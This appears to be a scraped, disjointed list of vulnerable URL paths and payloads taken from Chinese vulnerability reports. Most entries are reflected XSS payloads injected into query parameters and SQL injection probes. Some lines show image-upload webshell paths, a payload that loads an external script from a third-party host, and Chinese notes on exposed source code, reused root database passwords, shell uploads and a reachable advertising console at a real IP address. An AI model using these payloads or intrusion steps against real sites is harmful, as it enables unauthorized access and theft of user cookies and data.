/get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /get/file/content/old_image/xxxxx /5107/msg/sendmsg.php //resume/resume-list.php?key=test00%bf /info.php /newbbs91/2012/05/31/1338433258596.jpg /newbbs91/2012/05/31/1338433258596.jpg /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png /modify/42/124/4fc6df44153b79013/p4fdc979dc7930c /2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png[/img /member/UserSettings/的时候), /member/Ajax_Profile /broadcast/add /t91/broadcast/c7/2d/91/c72d9149f543841f5ce0175f1f96cc1e.small.png"onload="alert(document.cookie) /broadcast/add http://www.baidu.com<img/src="1"onerror="alert(/xxxxxx/ http://www.baidu.com<img/src="1"onerror="jQuery.getScript('//xsst.sinaapp.com/m.js /MoviePageAricle2.aspx?aid=46366 www.njulib.cn,去掉www访问后Apache有直接列目录权限,那里面居然可以下载到网站源代码和phpMyAdmin目录……于是轻松看到数据库连接参数,代码中是直接用root帐号连接MySQL的。试了几个该公司承接的其他网站,基本都是用的同一个密码,都可以登录phpMyAdmin。 /survey/plus_surveyresult.asp?classid=173 /News_title.php?keyword=Class-1&article_id=NS1100537 /News_title.php?keyword=Class-1&article_id=NS1100537 /huodong/?sorts=1 /Manage/main.html /project/sample/login/index.jsp / /exploits/18329/ /cgi-bin/hseed/two.pl /static/newadd/img/logo.png/1.php /drawsomething/images/img.gif/1.php /szy/ /filelist/download.jsp?filename=%E5%87%8F%E5%85%8D%E7%A8%8E%E7%94%B3%E8%AF%B7%E5%A4%87%E6%A1%88%E8%A1%A8.doc /video/VideoList.jsp?nav=communion&nav2=six /adduser/ /),下载了介绍文件大概知道了UC广告的流程。但后来一不小心发现这台服务器上还存在UC无线营销平台(地址http://115.238.228.138:8050/console/),这个平台控制着UC浏览器所有的内显广告。 /214/2388/0/f/13140686800.gif/1.php /images/sl_logo.jpg/1.php /files/Sctc/news_detail.jsp?id=12597 /tz/jsp/tz/active2009/index.jsp www.quamnet.com /message /v2.5/js/proj/_message_info.js里可以看到函数相关部分, /,下属CCAT培训和证书查询网站存在大量SQL注入漏洞,后台可上传shell, /certificates/,输入1 /admin/index.asp存在SQL注入,可登录后台构造特殊目录上传Shell /ndvs/ /ndvs/auto_UserPswd.asp?UserName=admin /ndvs/User.asp?UserID=1 /friend/mm_friend/info.php?id=xxx url(http://"\") expression(alert(document.cookie)) /oa/category/index.php?categoryId=165'%20or%20'1'= /commlist/index.php?categoryId=1393'%20or%20% /gq/index.php?nodeId=195'%20or%20'1'='2 /cioexpert/index.php?nodeId=536'%20or%20'1'='2 /news/index.php?categoryId=583'%20or%20'1'='2 /news/index.php?categoryId=1338'%20or%20'1'=% /netdiy/cgfa/index.php?nodeId=526&categoryId=1492'%20or%20'1% /soft/list/category/nodeList.php?categoryId=1406&level=2'%20or% /commlist/?page=1&categoryId=1393'%20or%20'1'='2 /news/more.php?name=产业动态&nodeId=2035'%20or%20'1'='2 /news/?page=1&categoryId=1338'%20or%20'1'='2 /search/search_article.php?pid=%22%3E%3Cscript%3Ealert%288977135%29%3B%3C/script%3E&checkemail=0 /categorylist.php?categoryId=1533&name=%22%3E%3Cscript%3Ealert%288966775%29%3B%3C/script%3E /list/list.php?nodeId=59&name=%22%3E%3Cscript%3Ealert%285183621%29%3B%3C/script%3E /list/positionList.php?positionId=25&name=%22%3E%3Cscript%3Ealert%280727859%29%3B%3C/script%3E /yejiedongtai/index.php?name=%22%3E%3Cscript%3Ealert%283923548%29%3B%3C/script%3E /fortunenode/index.php?nodeId=1813&name=%22%3E%3Cscript%3Ealert%282364748%29%3B%3C/script%3E /complexnode/index.php?nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%283107906%29%3B%3C/script%3E /commlist/index.php?categoryId=1393&name=%22%3E%3Cscript%3Ealert%285573514%29%3B%3C/script%3E /news/index.php?categoryId=583&name=%22%3E%3Cscript%3Ealert%283291737%29%3B%3C/script%3E /cionode/index.php?nodeId=232&name=%22%3E%3Cscript%3Ealert%283347723%29%3B%3C/script%3E /jinrigengxin/index.php?nodeId=174&name=%22%3E%3Cscript%3Ealert%284075823%29%3B%3C/script%3E /newsposition/index.php?positionId=101&name=%22%3E%3Cscript%3Ealert%280423207%29%3B%3C/script%3E /news/index.php?categoryId=1338&name=%22%3E%3Cscript%3Ealert%286221176%29%3B%3C/script%3E /mobilenode/index.php?nodeId=477&name=%22%3E%3Cscript%3Ealert%281562061%29%3B%3C/script%3E /6.php?bigCID= /list/index.php?nodeId1=1036&nodeId2=447&nodeId3=371&name=%22%3E%3Cscript%3Ealert%281885420%29%3B%3C/script%3E /list/diy/index.php?nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%283402915%29%3B%3C/script%3E /list/node/index.php?nodeId=1712&name=%22%3E%3Cscript%3Ealert%282924914%29%3B%3C/script%3E /notebook/list/index.php?nodeId1=502&name=%22%3E%3Cscript%3Ealert%286628845%29%3B%3C/script%3E /list/nodelevelandCategory/index.php?nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281206047%29%3B%3C/script%3E&name=商务笔记本 /list/nodeIdandCategory/index.php?categoryId=%22%3E%3Cscript%3Ealert%286029544%29%3B%3C/script%3E&nodeId=1036&name=资讯 /4.php?bigCID= /list/nodelevelandCategory/index.php?nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285658733%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=%22%3E%3Cscript%3Ealert%283933171%29%3B%3C/script%3E&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /list/nodeIdandCategory/index.php?categoryId=1476&nodeId=1036&name=%22%3E%3Cscript%3Ealert%284112910%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=%22%3E%3Cscript%3Ealert%288228729%29%3B%3C/script%3E&name=评测 /list/category/index.php?categoryId=%22%3E%3Cscript%3Ealert%283631018%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=%22%3E%3Cscript%3Ealert%285351740%29%3B%3C/script%3E&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /list/category/index.php?categoryId=1318&name=%22%3E%3Cscript%3Ealert%283105104%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=1391&name=%22%3E%3Cscript%3Ealert%289518732%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=%22%3E%3Cscript%3Ealert%282614320%29%3B%3C/script%3E&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /oa/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%280044518%29%3B%3C/script%3E /list/nodelevel2/index.php?nodeIdLevel2=%22%3E%3Cscript%3Ealert%284342166%29%3B%3C/script%3E&name=整机 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=%22%3E%3Cscript%3Ealert%287118728%29%3B%3C/script%3E&yingyongId=448&nodeLevel2Id=267&name=芯片技术 /104.php?bigCID= /oa/topic/index.php?nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%283488662%29%3B%3C/script%3E&name=专题 /netdiy/cgfa/index.php?nodeId=526&categoryId=1492&name=%22%3E%3Cscript%3Ealert%287733514%29%3B%3C/script%3E /oa/printscroll/list/index.php?typeId=%22%3E%3Cscript%3Ealert%287733514%29%3B%3C/script%3E&categoryId=105&name=一体机 /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=%22%3E%3Cscript%3Ealert%283418599%29%3B%3C/script%3E&nodeLevel2Id=267&name=芯片技术 /list/nodelevel2/index.php?nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%283418599%29%3B%3C/script%3E /printer/printer/index.php?categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%288874447%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E&name=芯片技术 /printer/scrollplot/list/index.php?typeId=%22%3E%3Cscript%3Ealert%287235459%29%3B%3C/script%3E&categoryId=104&name=复印机复合机 /oa/topic/index.php?nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E /projector/projectiondisplay/list/index.php?typeId=%22%3E%3Cscript%3Ealert%284023585%29%3B%3C/script%3E&categoryId=119&name=投影机 /oa/category/index.php?categoryId=165&name=%22%3E%3Cscript%3Ealert%284232933%29%3B%3C/script%3E /list/public/index.php?nodeId=1042&zixunId=447&hangqingId=449&daogouId=453&pingceId=451&yingyongId=448&nodeLevel2Id=267&name=%22%3E%3Cscript%3Ealert%284861999%29%3B%3C/script%3E /netdiy/router/list/index.php?nodeId=525&typeId=%22%3E%3Cscript%3Ealert%280019428%29%3B%3C/script%3E&categoryId=46&name=交换机 /oa/printscroll/list/index.php?typeId=105&categoryId=105&name=%22%3E%3Cscript%3Ealert%280164505%29%3B%3C/script%3E /printer/scrollplot/list/index.php?typeId=104&categoryId=104&name=%22%3E%3Cscript%3Ealert%289127259%29%3B%3C/script%3E /projector/projectiondisplay/list/index.php?typeId=119&categoryId=119&name=%22%3E%3Cscript%3Ealert%281309529%29%3B%3C/script%3E /printer/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%282443590%29%3B%3C/script%3E /oa/printscroll/index.php?categoryId=155,156,158,160,116&name=%22%3E%3Cscript%3Ealert%286705186%29%3B%3C/script%3E /netdiy/router/list/index.php?nodeId=525&typeId=46&categoryId=46&name=%22%3E%3Cscript%3Ealert%282176758%29%3B%3C/script%3E /oa/complexlist/index.php?categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%286269462%29%3B%3C/script%3E /projector/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%287313459%29%3B%3C/script%3E /netdiy/news/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%286832657%29%3B%3C/script%3E /list/node/index.php?nodeId=415&name=%22%3E%3Cscript%3Ealert%289558576%29%3B%3C/script%3E /list/positionList.php?positionId=70&name=%22%3E%3Cscript%3Ealert%288041743%29%3B%3C/script%3E /list/nodelevel2/index.php?nodeId=&name=%22%3E%3Cscript%3Ealert%280511604%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=529&name=%22%3E%3Cscript%3Ealert%286845032%29%3B%3C/script%3E /18.php?bigCID= /list/public/index.php?nodeLevel2Id=263&categoryId=1436&name=%22%3E%3Cscript%3Ealert%284864933%29%3B%3C/script%3E /soft/list/nodeList.php?name=%22%3E%3Cscript%3Ealert%282249685%29%3B%3C/script%3E&nodeId=309 /10.php?bigCID= /list/nodeList.php?name=%22%3E%3Cscript%3Ealert%280181458%29%3B%3C/script%3E&nodeId=315 /list/positionList.php?name=%22%3E%3Cscript%3Ealert%286639160%29%3B%3C/script%3E&positionId=115 /78.php?tip=6&bigCID= /soft/list/category/nodeList.php?categoryId=1406&level=2&nodeId=257&name=%22%3E%3Cscript%3Ealert%286121285%29%3B%3C/script%3E /list/category/nodeList.php?categoryId=1415&level=2&nodeId=257&name=%22%3E%3Cscript%3Ealert%282124874%29%3B%3C/script%3E /list/list.php?nodeId=1801&name=%22%3E%3Cscript%3Ealert%289529156%29%3B%3C/script%3E /54.php?tip=1&bigCID= /48.php?tip=0&bigCID= /77.php?tip=5&bigCID= /61.php?tip=2&bigCID= /76.php?tip=8&bigCID= /170.php?tip=9&bigCID= /list/positionList.php?positionId=7&name=%22%3E%3Cscript%3Ealert%280515268%29%3B%3C/script%3E /55.php?bigCID= /30.php?bigCID= /119.php?bigCID= /31.php?tip=1&bigCID= /36.php?tip=5&bigCID= /32.php?tip=2&bigCID= /80.php?tip=1&bigCID= /33.php?tip=3&bigCID= /88.php?tip=1&bigCID= /34.php?tip=4&bigCID= /169.php?tip=2&bigCID= /list_detail.php?cID=44&bigCID= /117.php?tip=1&bigCID= /156.php?tip=4&bigCID= /5.php?bigCID= /155.php?tip=3&bigCID= /158.php?tip=5&bigCID= /165.php?tip=8&bigCID= /105.php?tip=1&bigCID= /top_more.php?cID= /top_more.php?cID=4&cName= /top_more.php?cID=4&cName=笔记本&incN= /list/product/index.php?categoryId=11&name=%22%3E%3Cscript%3Ealert%287297932%29%3B%3C/script%3E /list/nodelevel2andCategory/index.php?categoryId=1390&name=%22%3E%3Cscript%3Ealert%288501309%29%3B%3C/script%3E /fortunenode/?page=2&nodeId=1813&name=%22%3E%3Cscript%3Ealert%282941973%29%3B%3C/script%3E /fortunenode/?page=1&nodeId=1813&name=%22%3E%3Cscript%3Ealert%282391872%29%3B%3C/script%3E /fortunenode/?page=5&nodeId=1813&name=%22%3E%3Cscript%3Ealert%285508696%29%3B%3C/script%3E /fortunenode/?page=4&nodeId=1813&name=%22%3E%3Cscript%3Ealert%281810968%29%3B%3C/script%3E /fortunenode/?page=3&nodeId=1813&name=%22%3E%3Cscript%3Ealert%281810968%29%3B%3C/script%3E /fortunenode/?page=8&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=7&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=6&nodeId=1813&name=%22%3E%3Cscript%3Ealert%283446984%29%3B%3C/script%3E /fortunenode/?page=9&nodeId=1813&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=1&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=2&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=4&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=3&name=%22%3E%3Cscript%3Ealert%280111726%29%3B%3C/script%3E /yejiedongtai/?page=8&name=%22%3E%3Cscript%3Ealert%287807484%29%3B%3C/script%3E /yejiedongtai/?page=7&name=%22%3E%3Cscript%3Ealert%282110832%29%3B%3C/script%3E /yejiedongtai/?page=6&name=%22%3E%3Cscript%3Ealert%281418433%29%3B%3C/script%3E /yejiedongtai/?page=5&name=%22%3E%3Cscript%3Ealert%282110832%29%3B%3C/script%3E /yejiedongtai/?page=9&name=%22%3E%3Cscript%3Ealert%284855881%29%3B%3C/script%3E /complexnode/?page=1&nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%283676701%29%3B%3C/script%3E /complexnode/?page=2&nodeId=1149,1150,1509,1622&name=%22%3E%3Cscript%3Ealert%289900022%29%3B%3C/script%3E /newsposition/index.php?name=%22%3E%3Cscript%3Ealert%281063181%29%3B%3C/script%3E&positionId=504 /commlist/?page=1&categoryId=1393&name=%22%3E%3Cscript%3Ealert%284703398%29%3B%3C/script%3E /commlist/?page=2&categoryId=1393&name=%22%3E%3Cscript%3Ealert%287188139%29%3B%3C/script%3E /commlist/?page=3&categoryId=1393&name=%22%3E%3Cscript%3Ealert%289377102%29%3B%3C/script%3E /commlist/?page=4&categoryId=1393&name=%22%3E%3Cscript%3Ealert%281573803%29%3B%3C/script%3E /commlist/?page=5&categoryId=1393&name=%22%3E%3Cscript%3Ealert%281183085%29%3B%3C/script%3E /commlist/?page=7&categoryId=1393&name=%22%3E%3Cscript%3Ealert%286589693%29%3B%3C/script%3E /commlist/?page=8&categoryId=1393&name=%22%3E%3Cscript%3Ealert%285089784%29%3B%3C/script%3E /commlist/?page=6&categoryId=1393&name=%22%3E%3Cscript%3Ealert%284527067%29%3B%3C/script%3E /commlist/?page=9&categoryId=1393&name=%22%3E%3Cscript%3Ealert%283362557%29%3B%3C/script%3E /news/more.php?name=%22%3E%3Cscript%3Ealert%280561981%29%3B%3C/script%3E&nodeId=2035 /solution/more.php?name=%22%3E%3Cscript%3Ealert%285239895%29%3B%3C/script%3E&nodeId=2045 /news/?page=2&categoryId=583&name=%22%3E%3Cscript%3Ealert%286916568%29%3B%3C/script%3E /news/?page=1&categoryId=583&name=%22%3E%3Cscript%3Ealert%282305454%29%3B%3C/script%3E /news/?page=3&categoryId=583&name=%22%3E%3Cscript%3Ealert%280629255%29%3B%3C/script%3E /news/?page=4&categoryId=583&name=%22%3E%3Cscript%3Ealert%285894503%29%3B%3C/script%3E /news/?page=6&categoryId=583&name=%22%3E%3Cscript%3Ealert%288313014%29%3B%3C/script%3E /news/?page=5&categoryId=583&name=%22%3E%3Cscript%3Ealert%284204711%29%3B%3C/script%3E /news/?page=7&categoryId=583&name=%22%3E%3Cscript%3Ealert%280451959%29%3B%3C/script%3E /news/?page=8&categoryId=583&name=%22%3E%3Cscript%3Ealert%286437685%29%3B%3C/script%3E /news/?page=9&categoryId=583&name=%22%3E%3Cscript%3Ealert%284596701%29%3B%3C/script%3E /cionode/?page=1&nodeId=232&name=%22%3E%3Cscript%3Ealert%286676064%29%3B%3C/script%3E /cionode/?page=2&nodeId=232&name=%22%3E%3Cscript%3Ealert%282894541%29%3B%3C/script%3E /cionode/?page=3&nodeId=232&name=%22%3E%3Cscript%3Ealert%288302943%29%3B%3C/script%3E /cionode/?page=4&nodeId=232&name=%22%3E%3Cscript%3Ealert%284614342%29%3B%3C/script%3E /cionode/?page=5&nodeId=232&name=%22%3E%3Cscript%3Ealert%287811052%29%3B%3C/script%3E /cionode/?page=6&nodeId=232&name=%22%3E%3Cscript%3Ealert%286340240%29%3B%3C/script%3E /cionode/?page=7&nodeId=232&name=%22%3E%3Cscript%3Ealert%289447940%29%3B%3C/script%3E /cionode/?page=8&nodeId=232&name=%22%3E%3Cscript%3Ealert%285859438%29%3B%3C/script%3E /cionode/?page=9&nodeId=232&name=%22%3E%3Cscript%3Ealert%288976037%29%3B%3C/script%3E /jinrigengxin/?page=3&nodeId=174&name=%22%3E%3Cscript%3Ealert%286983154%29%3B%3C/script%3E /jinrigengxin/?page=1&nodeId=174&name=%22%3E%3Cscript%3Ealert%289009533%29%3B%3C/script%3E /jinrigengxin/?page=2&nodeId=174&name=%22%3E%3Cscript%3Ealert%281166529%29%3B%3C/script%3E /jinrigengxin/?page=4&nodeId=174&name=%22%3E%3Cscript%3Ealert%288500426%29%3B%3C/script%3E /jinrigengxin/?page=5&nodeId=174&name=%22%3E%3Cscript%3Ealert%282241740%29%3B%3C/script%3E /jinrigengxin/?page=6&nodeId=174&name=%22%3E%3Cscript%3Ealert%282905826%29%3B%3C/script%3E /jinrigengxin/?page=8&nodeId=174&name=%22%3E%3Cscript%3Ealert%280953124%29%3B%3C/script%3E /jinrigengxin/?page=7&nodeId=174&name=%22%3E%3Cscript%3Ealert%288892411%29%3B%3C/script%3E /newsposition/?page=1&positionId=101&name=%22%3E%3Cscript%3Ealert%289937494%29%3B%3C/script%3E /jinrigengxin/?page=9&nodeId=174&name=%22%3E%3Cscript%3Ealert%283779686%29%3B%3C/script%3E /newsposition/?page=2&positionId=101&name=%22%3E%3Cscript%3Ealert%286349813%29%3B%3C/script%3E /newsposition/?page=3&positionId=101&name=%22%3E%3Cscript%3Ealert%281261478%29%3B%3C/script%3E /newsposition/?page=6&positionId=101&name=%22%3E%3Cscript%3Ealert%282559542%29%3B%3C/script%3E /newsposition/?page=4&positionId=101&name=%22%3E%3Cscript%3Ealert%282361563%29%3B%3C/script%3E /newsposition/?page=8&positionId=101&name=%22%3E%3Cscript%3Ealert%286668253%29%3B%3C/script%3E /newsposition/?page=5&positionId=101&name=%22%3E%3Cscript%3Ealert%289774952%29%3B%3C/script%3E /newsposition/?page=7&positionId=101&name=%22%3E%3Cscript%3Ealert%289774952%29%3B%3C/script%3E /newsposition/?page=9&positionId=101&name=%22%3E%3Cscript%3Ealert%280394131%29%3B%3C/script%3E /news/?page=1&categoryId=1338&name=%22%3E%3Cscript%3Ealert%285236481%29%3B%3C/script%3E /news/?page=2&categoryId=1338&name=%22%3E%3Cscript%3Ealert%284442836%29%3B%3C/script%3E /news/?page=3&categoryId=1338&name=%22%3E%3Cscript%3Ealert%288651255%29%3B%3C/script%3E /news/?page=4&categoryId=1338&name=%22%3E%3Cscript%3Ealert%281381124%29%3B%3C/script%3E /news/?page=5&categoryId=1338&name=%22%3E%3Cscript%3Ealert%287496090%29%3B%3C/script%3E /newsnode/index.php?nodeId=1832&categoryId=1395&name=%22%3E%3Cscript%3Ealert%281774307%29%3B%3C/script%3E /news/?page=7&categoryId=1338&name=%22%3E%3Cscript%3Ealert%289121892%29%3B%3C/script%3E /news/?page=6&categoryId=1338&name=%22%3E%3Cscript%3Ealert%287650813%29%3B%3C/script%3E /news/?page=8&categoryId=1338&name=%22%3E%3Cscript%3Ealert%283644900%29%3B%3C/script%3E /news/?page=9&categoryId=1338&name=%22%3E%3Cscript%3Ealert%282868877%29%3B%3C/script%3E /mobilenode/?page=1&nodeId=477&name=%22%3E%3Cscript%3Ealert%280030058%29%3B%3C/script%3E /mobilenode/?page=2&nodeId=477&name=%22%3E%3Cscript%3Ealert%289893380%29%3B%3C/script%3E /mobilenode/?page=3&nodeId=477&name=%22%3E%3Cscript%3Ealert%283800935%29%3B%3C/script%3E /mobilenode/?page=5&nodeId=477&name=%22%3E%3Cscript%3Ealert%287726808%29%3B%3C/script%3E /mobilenode/?page=4&nodeId=477&name=%22%3E%3Cscript%3Ealert%287726808%29%3B%3C/script%3E /newsposition/index.php?positionId=%22%3E%3Cscript%3Ealert%285145068%29%3B%3C/script%3E&name=精华方案 /mobilenode/?page=6&nodeId=477&name=%22%3E%3Cscript%3Ealert%284665164%29%3B%3C/script%3E /mobilenode/?page=7&nodeId=477&name=%22%3E%3Cscript%3Ealert%285283389%29%3B%3C/script%3E /mobilenode/?page=8&nodeId=477&name=%22%3E%3Cscript%3Ealert%287992778%29%3B%3C/script%3E /mobilenode/?page=9&nodeId=477&name=%22%3E%3Cscript%3Ealert%280150538%29%3B%3C/script%3E /list/diy/nodeIndex.php?nodeId=447&nodeId1=1042&name=%22%3E%3Cscript%3Ealert%285110923%29%3B%3C/script%3E /newsposition/index.php?positionId=344&name=%22%3E%3Cscript%3Ealert%282494034%29%3B%3C/script%3E /list/diy/?page=3&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%286683377%29%3B%3C/script%3E /list/diy/?page=1&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%282469512%29%3B%3C/script%3E /list/diy/?page=2&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%288873350%29%3B%3C/script%3E /list/diy/?page=4&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%282853133%29%3B%3C/script%3E /list/diy/?page=5&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284479224%29%3B%3C/script%3E /list/node/?page=4&nodeId=1712&name=%22%3E%3Cscript%3Ealert%281655791%29%3B%3C/script%3E /list/node/?page=5&nodeId=1712&name=%22%3E%3Cscript%3Ealert%282697893%29%3B%3C/script%3E /list/node/?page=1&nodeId=1712&name=%22%3E%3Cscript%3Ealert%289593894%29%3B%3C/script%3E /list/node/?page=2&nodeId=1712&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E /list/node/?page=3&nodeId=1712&name=%22%3E%3Cscript%3Ealert%287422276%29%3B%3C/script%3E /list/diy/?page=6&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E /list/diy/?page=9&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%284226587%29%3B%3C/script%3E /list/diy/?page=8&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%289058165%29%3B%3C/script%3E /list/diy/?page=7&nodeIdLevel2=267&name=%22%3E%3Cscript%3Ealert%281265964%29%3B%3C/script%3E /list/nodelevelandCategory/?page=1&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281437223%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=2&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%285633336%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=4&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%288850622%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=6&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%288850622%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=3&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281014195%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=5&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%284207119%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=7&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%286481937%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=8&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%280229790%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=6&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285917291%29%3B%3C/script%3E /list/nodelevelandCategory/?page=9&nodeIdLevel2=244&categoryId=%22%3E%3Cscript%3Ealert%281385788%29%3B%3C/script%3E&name=商务笔记本 /list/nodelevelandCategory/?page=4&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287542280%29%3B%3C/script%3E /list/nodelevelandCategory/?page=2&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%282855695%29%3B%3C/script%3E /list/nodelevelandCategory/?page=5&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%288697277%29%3B%3C/script%3E /list/nodelevelandCategory/?page=1&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287150363%29%3B%3C/script%3E /list/nodelevelandCategory/?page=3&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287116375%29%3B%3C/script%3E /list/nodelevelandCategory/?page=7&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%288872601%29%3B%3C/script%3E /list/nodelevelandCategory/?page=8&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287716559%29%3B%3C/script%3E /list/nodelevelandCategory/?page=9&nodeIdLevel2=244&categoryId=1318&name=%22%3E%3Cscript%3Ealert%280077336%29%3B%3C/script%3E /list/category/?page=1&categoryId=%22%3E%3Cscript%3Ealert%289962911%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=2&categoryId=%22%3E%3Cscript%3Ealert%280708936%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=3&categoryId=%22%3E%3Cscript%3Ealert%287956376%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/nodeIdandCategory/?page=1&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%289145460%29%3B%3C/script%3E&name=资讯 /list/category/?page=1&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287128735%29%3B%3C/script%3E /list/category/?page=4&categoryId=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=2&categoryId=1318&name=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E /list/category/?page=9&categoryId=%22%3E%3Cscript%3Ealert%285177022%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=5&categoryId=%22%3E%3Cscript%3Ealert%280584221%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=7&categoryId=%22%3E%3Cscript%3Ealert%289419719%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=3&categoryId=1318&name=%22%3E%3Cscript%3Ealert%283531134%29%3B%3C/script%3E /list/category/?page=6&categoryId=%22%3E%3Cscript%3Ealert%289419719%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/category/?page=8&categoryId=%22%3E%3Cscript%3Ealert%286201025%29%3B%3C/script%3E&name=上网本·3G笔记本 /list/nodeIdandCategory/?page=3&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%283814536%29%3B%3C/script%3E&name=资讯 /list/nodeIdandCategory/?page=1&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%281199640%29%3B%3C/script%3E /list/nodeIdandCategory/?page=5&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%289711890%29%3B%3C/script%3E&name=资讯 /list/category/?page=5&categoryId=1318&name=%22%3E%3Cscript%3Ealert%284969587%29%3B%3C/script%3E /list/nodeIdandCategory/?page=8&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%280327766%29%3B%3C/script%3E&name=资讯 /list/category/?page=9&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285045779%29%3B%3C/script%3E /list/nodeIdandCategory/?page=6&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%284423786%29%3B%3C/script%3E&name=资讯 /list/category/?page=7&categoryId=1318&name=%22%3E%3Cscript%3Ealert%287734753%29%3B%3C/script%3E /list/category/?page=4&categoryId=1318&name=%22%3E%3Cscript%3Ealert%286595389%29%3B%3C/script%3E /list/nodeIdandCategory/?page=7&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%285713857%29%3B%3C/script%3E&name=资讯 